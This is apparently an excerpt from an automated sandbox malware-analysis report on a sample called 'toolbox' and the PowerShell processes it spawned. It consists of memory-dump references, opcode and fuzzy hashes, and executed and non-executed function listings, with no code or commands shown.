            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: @$@$BC373ACA27924EBEA29D2A22E348ACB4$\
            • API String ID: 0-3488528484
            • Opcode ID: e22f365055d2d58ca011303b8da2d6c5bd92c4951effeb9b613869d4417d2d22
            • Instruction ID: de8d31b0916142247a676bd3510a5831d043539e828f1532cc0935f61f1d8d5f
            • Opcode Fuzzy Hash: e22f365055d2d58ca011303b8da2d6c5bd92c4951effeb9b613869d4417d2d22
            • Instruction Fuzzy Hash: 5BF27E30A0890A8FDF98EF1CC495EA577E1FB69700F1485A9E04EC72A6DE25EC45CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Control-flow graph of the function at 7ffa35ba59a4, which calls 7ffa35ba0300 and 7ffa35ba0260 (legend: Executed / Not Executed; rendered graph not recoverable, basic-block edge list not reproduced).
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: 073E77D0D536421AA25BF60B16746B88
            • API String ID: 0-3873619420
            • Opcode ID: a9422ffb86e185718b2b60d2a1612f3eca9fc38168a3c4f046af1c972298d832
            • Instruction ID: aee08a11022d8164648924e0297801b71cb5648122bf8014559c185ddfe0b6f2
            • Opcode Fuzzy Hash: a9422ffb86e185718b2b60d2a1612f3eca9fc38168a3c4f046af1c972298d832
            • Instruction Fuzzy Hash: 5A828030A08A098FCB88EF28D4E4E6577E1FB69315B5456ADD04FC72A2DE34E845DF81
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 037af2729bae873d3bdfeaa17bacc88ae4b1deb523b2f268e8005cc3e2ef13c9
            • Instruction ID: 0a7f914c47aa6458c60c81b75b00010f84d1450c023322f662533860b78b9076
            • Opcode Fuzzy Hash: 037af2729bae873d3bdfeaa17bacc88ae4b1deb523b2f268e8005cc3e2ef13c9
            • Instruction Fuzzy Hash: F8918E30508A8D8FDBA8DF18D8557F97BA1EF5A300F10816ED84DC7292DE75A885CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID: Connection
            • String ID:
            • API String ID: 1722446006-0
            • Opcode ID: dfe84d5632786c4db75194d9cb5e5c93391656e597622a0bc965de9d4620c4f5
            • Instruction ID: f2ddbfedc42679682a0ca03d0dd8b78411b53d2cb44db60b4d222bafeec0d868
            • Opcode Fuzzy Hash: dfe84d5632786c4db75194d9cb5e5c93391656e597622a0bc965de9d4620c4f5
            • Instruction Fuzzy Hash: 1D818230508A8D4FDB69DF18D8567E93BE1EF5A310F04816ED84DC7292DF75A845CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            Control-flow graph of the function at 7ffa35c28800 (legend: Executed / Not Executed; rendered graph not recoverable, basic-block edge list not reproduced).
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID: Xm5
            • API String ID: 0-2004575312
            • Opcode ID: 55c1b5465ce6aec410af6591d982c413b2d5b81d7c73a0d50c2a4fd1d85953f9
            • Instruction ID: a32b1a8c46992557b2a577ccaf95aebf256f366f85ad2c9b850321365d70058e
            • Opcode Fuzzy Hash: 55c1b5465ce6aec410af6591d982c413b2d5b81d7c73a0d50c2a4fd1d85953f9
            • Instruction Fuzzy Hash: 60514623A0CB964FEB66972C68556B5BFE0EF57714F0881FBD04DC7193DD1A98048382
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ac7b8835415771b9f421d9cc778646896d3318e494ec6de5efcf7dc36d37afca
            • Instruction ID: 4308bc11a973345378b910649bd4e527e7b6ad0c6bb3931bf357a4ffd9fd5b1c
            • Opcode Fuzzy Hash: ac7b8835415771b9f421d9cc778646896d3318e494ec6de5efcf7dc36d37afca
            • Instruction Fuzzy Hash: 8A01D261A1C7C24FEB569B38886A0757FE0EF07B54B0988FED09DC7293CE2CA4059752
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0876f61021dc76086530c20b0a6084db0f83eb48d63065b85b22704b789e20cf
            • Instruction ID: 122033d127c12dbebdbae764560312d09915fadde828aea0aeee5974b4bd1f6e
            • Opcode Fuzzy Hash: 0876f61021dc76086530c20b0a6084db0f83eb48d63065b85b22704b789e20cf
            • Instruction Fuzzy Hash: 2401D23290DF8B4FEBA1E76C98101B5B7E1FF86A15B5481BEC04EC31D6CE29A804C341
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5752bc544cd2aa99d7f297d342f242b07bca0a87e7224fed89aa4d2635c8b1fe
            • Instruction ID: 8fc01f07d19be7b9814ca13b626bb35f57c6de3d2ceb410c2373e5c2193859e7
            • Opcode Fuzzy Hash: 5752bc544cd2aa99d7f297d342f242b07bca0a87e7224fed89aa4d2635c8b1fe
            • Instruction Fuzzy Hash: D401D282D0E7C70FFAA6A36C58150786EE1AF13A58718C4FBD04DCB1D3DC196C4953A1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0238d52c4013edd802e3172028c6a00b3b71d32ff8af96f6ae20151fe44eb876
            • Instruction ID: 4373c176a5adfde877882b9b32132c3f3ac1c51c48ed4b971407a54079916b13
            • Opcode Fuzzy Hash: 0238d52c4013edd802e3172028c6a00b3b71d32ff8af96f6ae20151fe44eb876
            • Instruction Fuzzy Hash: 45F08C51A1D3C20FEB17473448292B67FA19F43A08B0A84FAC09DCB0E3DD1CA8099311
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.702188736.00007FFA35C20000.00000040.00000001.sdmp, Offset: 00007FFA35C20000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35c20000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 75c78e6f8a3957e932d66c2c77268f17ee2c43276b8fb6b7074337185b68a282
            • Instruction ID: 447ca848fd483d8120a27c68413fcc9aabf32d87a9b033519eabd98287a377a7
            • Opcode Fuzzy Hash: 75c78e6f8a3957e932d66c2c77268f17ee2c43276b8fb6b7074337185b68a282
            • Instruction Fuzzy Hash: E0E02B33E0C6494FEB55D76C58015E8BBA1EF6B361F18807FD00DC3143CD2A94118B50
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Memory Dump Source
            • Source File: 00000000.00000002.702133400.00007FFA35BA0000.00000040.00000001.sdmp, Offset: 00007FFA35BA0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ffa35ba0000_toolbox.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d111078b9a37c2b4fb9d2b3c7a8f8913f4fb6607cc3f450c67207c9d022f3248
            • Instruction ID: 48ae62f737f7adb5969cc2e48b0893ee7dc25b8226b5e637e6aa197ab626563f
            • Opcode Fuzzy Hash: d111078b9a37c2b4fb9d2b3c7a8f8913f4fb6607cc3f450c67207c9d022f3248
            • Instruction Fuzzy Hash: D851251290D2D34EE712B73CB8A20E57FA0AF0375471944F7D18D8A0E7EE4D78898266
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 19544d3c7e52908074abaa637c8f7f60d68547e618d368e73ce92f2050ffcd62
            • Instruction ID: 4f9ed94885328f9629dcbc19388e72307ab83b4bcbc3117616fa8de9951b3849
            • Opcode Fuzzy Hash: 19544d3c7e52908074abaa637c8f7f60d68547e618d368e73ce92f2050ffcd62
            • Instruction Fuzzy Hash: 20321A22A0C7874FEB52EB2CE8651E57FE0EF57714B1980B7D08CC7193ED59A8468391
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1389d2ea79cbb5bde216d31beb44ee4c2080dd3a8c1ad2aaccc28fb1252f4cfd
            • Instruction ID: b72ccaaca0aeb649a223b45b5f748aea85f72959eb3a0eddf98a76fb4c452d54
            • Opcode Fuzzy Hash: 1389d2ea79cbb5bde216d31beb44ee4c2080dd3a8c1ad2aaccc28fb1252f4cfd
            • Instruction Fuzzy Hash: 5F123631A08A4A8FDB54EF5CD892AE87BE0FF56710F14817AD04CC7192EFA9A845C7D1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 66fa27bc3ea7e81206cf26ad512f375d5fac0cc9b6fa787939b1407d4f2777e5
            • Instruction ID: 8f53cad64d1cf5b3e6af301c8479f796e70f4c505ed1e6a0f9e65b9c8e2ceff5
            • Opcode Fuzzy Hash: 66fa27bc3ea7e81206cf26ad512f375d5fac0cc9b6fa787939b1407d4f2777e5
            • Instruction Fuzzy Hash: E751493190CA8A4FD304DF1CD855AA6B7E1FFCA310F5486BAE04DC7196DE29E941C782
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d4ff3dd53cb8069ef1911e77b9c530c2925b33729f444451f9c29bc36278d104
            • Instruction ID: ad01e4c314eb77b3a118b900e3d92963fc3a985abf79278957977d958f190075
            • Opcode Fuzzy Hash: d4ff3dd53cb8069ef1911e77b9c530c2925b33729f444451f9c29bc36278d104
            • Instruction Fuzzy Hash: 3631C63060DA4A4FDB49DB1DD8559717BE0EF6B710B1440AED48DC7263DD56EC82C782
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9d912efcbb8d8552b505b5b04cc230df3bc6ed369c4bce42727c8c201925bfec
            • Instruction ID: 60b6a642befd6cd0ff1722c799f42576d677b507c2e902cd0d1bc82340d29898
            • Opcode Fuzzy Hash: 9d912efcbb8d8552b505b5b04cc230df3bc6ed369c4bce42727c8c201925bfec
            • Instruction Fuzzy Hash: 7601B132B1CB494FEB48AA1CE88257533E1EBA9324B10047DE48ED3257D857F846C745
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3da87bd7798952b4a2976be7c7c480140c776912b12a36151027e3b3caf38d97
            • Instruction ID: 81ba8b271f856ceb069281978edee33ff3da389ed887ecb7802722e6b0b7e994
            • Opcode Fuzzy Hash: 3da87bd7798952b4a2976be7c7c480140c776912b12a36151027e3b3caf38d97
            • Instruction Fuzzy Hash: DC01677111CB0C4FD744EF0CE451AA6B7E0FB95324F10056DE58AC3691DB36E881CB46
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672195266.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c0d84ce787a102f2f7afaa0d760ffeaa7727821b54242f78bcbec30914f906bf
            • Instruction ID: f8b198f688728132d069b63c22774fd4545cdfb84e5d9dfe238da34b7fe8e913
            • Opcode Fuzzy Hash: c0d84ce787a102f2f7afaa0d760ffeaa7727821b54242f78bcbec30914f906bf
            • Instruction Fuzzy Hash: 31F0373275C6054FDB5CAA1CF8529B573D1EB95320B10417EE48FC2696D917E8428685
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000002.00000002.672363380.00007FFA35C80000.00000040.00000001.sdmp, Offset: 00007FFA35C80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffa35c80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 87bc904792c00629fbbe2af1bb87c94a6e0e4c54d4456279bc4c569c5559313b
            • Instruction ID: ebc9baeeb405f4dcb633e51061497cc6786b3ecf5d9b12e5d2bfb1677a805683
            • Opcode Fuzzy Hash: 87bc904792c00629fbbe2af1bb87c94a6e0e4c54d4456279bc4c569c5559313b
            • Instruction Fuzzy Hash: 2CF0EC33D0C6494FEB55E75858055E87BA1EB6A361F18807FD00DD7153CD2954158B50
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Executed Functions

            Memory Dump Source
            • Source File: 00000003.00000002.688913169.00007FFA35B80000.00000040.00000001.sdmp, Offset: 00007FFA35B80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_7ffa35b80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 32aebd1e966dc4c417ff45309fe67066cf61bfad517036967ff01053333e50ca
            • Instruction ID: 6f56586621fac9b8e17d1e660d3edf03cc57f9660fe01ebf2437e4757c002d92
            • Opcode Fuzzy Hash: 32aebd1e966dc4c417ff45309fe67066cf61bfad517036967ff01053333e50ca
            • Instruction Fuzzy Hash: 1B41BB3290D7C24FD75A9B2CEC925A03BE1EF5361471840FAD0CDCB0A7E919684AC756
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.688913169.00007FFA35B80000.00000040.00000001.sdmp, Offset: 00007FFA35B80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_7ffa35b80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1fcc0a0d0779c0b8eedf106c584482d291d2ef2ab486b0283672d960fdd54730
            • Instruction ID: aac169f8f7c2c1432dc3f5fdbc02ae8306a4dfdb005158e37781c31e018bfadf
            • Opcode Fuzzy Hash: 1fcc0a0d0779c0b8eedf106c584482d291d2ef2ab486b0283672d960fdd54730
            • Instruction Fuzzy Hash: 2321923051CA494FDB49DF18D4926B9B7E0EF96360F50457DE48EC7196EE26A882C702
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.688913169.00007FFA35B80000.00000040.00000001.sdmp, Offset: 00007FFA35B80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_7ffa35b80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 477e27ae584e1eeee0999816ab50ff3a38371e0fbe9bfd7fe691e8bae7c25ad3
            • Instruction ID: 32a7ca9fd4b942830bda1d22af0a5d7923f7750e63a7e21e0677e5842fe5598a
            • Opcode Fuzzy Hash: 477e27ae584e1eeee0999816ab50ff3a38371e0fbe9bfd7fe691e8bae7c25ad3
            • Instruction Fuzzy Hash: E8E0C03276C6044F975CAA0CF8539B573D1E789224B50416EE48AC2656E916B8438685
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.689029214.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_7ffa35c50000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 935fbd13fa16e5c8df78d71c82df7a73f2a12b4de6f734ed0f9bbd25eb9b5ef4
            • Instruction ID: e0a5df3e5c314d2148ca45173d7d4e51af5b783ec85d31c97ed13edbd69b269f
            • Opcode Fuzzy Hash: 935fbd13fa16e5c8df78d71c82df7a73f2a12b4de6f734ed0f9bbd25eb9b5ef4
            • Instruction Fuzzy Hash: 2CF0E533A0C6498FEB52E7985C055E8BBA1EB663A1F18807ED01DD7153CD2A54218B61
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Executed Functions

            Memory Dump Source
            • Source File: 00000006.00000002.719043170.00007FFA35C80000.00000040.00000001.sdmp, Offset: 00007FFA35C80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35c80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 897580961f85b974e2f6748a543004b47cca9a5600b3b227e5f027d62d0eec87
            • Instruction ID: 1bebc553876a6b9e4cdcee1f665b93d3971b74afda7403683189bfcd58e4c6e2
            • Opcode Fuzzy Hash: 897580961f85b974e2f6748a543004b47cca9a5600b3b227e5f027d62d0eec87
            • Instruction Fuzzy Hash: AC81452290EBC64FD7A7877888695A17FF1DF57624B0D40FBC08DCB0A3D95A984AC352
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.719043170.00007FFA35C80000.00000040.00000001.sdmp, Offset: 00007FFA35C80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35c80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f584bda065bfb15b03080b7594b594b19676355ea760726a06daeea187dff112
            • Instruction ID: 07d07d9425a22f14d0d62dbf37bc4d799dfa859358e8d4dd6f2e595527c848f1
            • Opcode Fuzzy Hash: f584bda065bfb15b03080b7594b594b19676355ea760726a06daeea187dff112
            • Instruction Fuzzy Hash: 5B61293290CB4D5FE7A8EB1C9C865F67BD5FF97624B0441BAE44DC7152EE15AC018390
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.718942672.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b9f3bce46ab0c3d3c51053adaaf8a27263d477d5556de74deceba444aa14f5db
            • Instruction ID: cbe3d60ed624cca765c1e43cbbdbe20ded869dd2a3c9f705c255178c145672a7
            • Opcode Fuzzy Hash: b9f3bce46ab0c3d3c51053adaaf8a27263d477d5556de74deceba444aa14f5db
            • Instruction Fuzzy Hash: 23515930A0CA4A4FEB99EB2CD8556B57BE1EF6B720B0441BBD44CC7193ED5AEC428351
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.718942672.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b01a890d4ca37135586581fbf8f3cfb4f9497caf0a7d7aab70395d1d837b48b3
            • Instruction ID: 88ff367fd8c7dbdf8c18b82b62e2b33e1393abe4da36f7aa77293bb5ecf471aa
            • Opcode Fuzzy Hash: b01a890d4ca37135586581fbf8f3cfb4f9497caf0a7d7aab70395d1d837b48b3
            • Instruction Fuzzy Hash: B341F637A0D7928FD715AB2CF8914E57BA0FF8363571440BBD1CDCA0A3DA19A84B8395
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.719043170.00007FFA35C80000.00000040.00000001.sdmp, Offset: 00007FFA35C80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35c80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5388dd0ae57fa76a7f418bbdaf8db64f0a2c567e6219523191e9b574965453e0
            • Instruction ID: 07cc9ff9d5a79a929fd1f68720b6ec41422608800f4c24b5b58c943e2c74f935
            • Opcode Fuzzy Hash: 5388dd0ae57fa76a7f418bbdaf8db64f0a2c567e6219523191e9b574965453e0
            • Instruction Fuzzy Hash: A5115672A0D78A4FD795C79C88525B47BA1EF17645B0880BEC44DC7193CD26A809C751
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.718942672.00007FFA35BB0000.00000040.00000001.sdmp, Offset: 00007FFA35BB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35bb0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 6bf2c9c1af7fe8f49b20ad8ff97d0bfb16ff4be21024a9370ed9e60521598fe8
            • Instruction ID: d2c3d6ee8b296e3c0dd25c38957fa34d0e207001cc509e7f421bbbdf59537951
            • Opcode Fuzzy Hash: 6bf2c9c1af7fe8f49b20ad8ff97d0bfb16ff4be21024a9370ed9e60521598fe8
            • Instruction Fuzzy Hash: 3A01677111CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3691DB36E881CB46
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.719043170.00007FFA35C80000.00000040.00000001.sdmp, Offset: 00007FFA35C80000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_6_2_7ffa35c80000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3633d56cc0cf7c7b8cae188f8f0ba24b399005a76d864eed2015c1c2d66ee9e0
            • Instruction ID: ea4bb8a557b8e93dcc9cfa0aeb6cc02c5be964a17e1379588b7c83b6e7b5838c
            • Opcode Fuzzy Hash: 3633d56cc0cf7c7b8cae188f8f0ba24b399005a76d864eed2015c1c2d66ee9e0
            • Instruction Fuzzy Hash: 00F0E532A0CA498FEB55E7A858116E8BBA1EF6A361F18807FD00DD3142DD2E94558B90
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions